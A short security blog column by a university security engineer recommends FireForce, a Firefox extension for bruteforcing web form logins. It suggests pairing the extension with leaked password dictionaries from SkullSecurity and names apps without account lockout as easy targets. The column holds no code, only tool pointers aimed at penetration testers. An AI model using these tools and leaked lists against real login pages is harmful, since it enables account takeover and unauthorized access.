Web Form Password Bruteforce Attacks Made Easy

Passwords suck. We all know it, but unless you can afford to provide mutli-factor authentication to all of your users, Web site users, and business partners, then you’re stuck with them.

Implementing technical controls to enforce strong password creation by your users is a necessity because users will pick weak passwords when given the opportunity. Sure, there are some exceptions to the rule, but those aren’t the ones we’re worried about as security professionals. We are worried about the ones that are easy to crack.

Back in March, Ron Bowes of posted a great blog titled “Hard Evidence that people Suck at Passwords” on skullsecurity.org. Ron takes a look at passwords that have been leaked by attackers who’ve breached sites like phpbb, Faithwriters, and Elite Hackers. He provides some interesting insight into password choices made by users.

Also, it’s worth noting that Ron is currently hosting password dictionaries that come from various sources like password cracking tools and leaked password lists from compromised Web sites. They are very useful with the tool I’m about to talk about.

In a discussion about password bruteforcing on the Metasploit Framework mailing list, someone pointed out a Firefox extension that enables bruteforce password attacks against Web forms from right within the browser. It’s FireForce and is available here.

What a simplistic but useful and powerful tool! Typically, we refrain from password attacks because of account lockout issues, but sometimes there are Web apps we encounter with a local user authentication source that has no lockout feature. FireForce is simple in its implementation, but powerful enough to allow for bruteforcing of just passwords or both usernames and passwords.

Teamed up with the passwords hosted at SkullSecurity, FireForce is nearly unstoppable, but it’s not a replacement for Medusa. Be sure to read the documentation for info on running separate Firefox instances and configuring the username and password bruteforcing properly as the dictionary selection is a little backwards.

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John’s not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.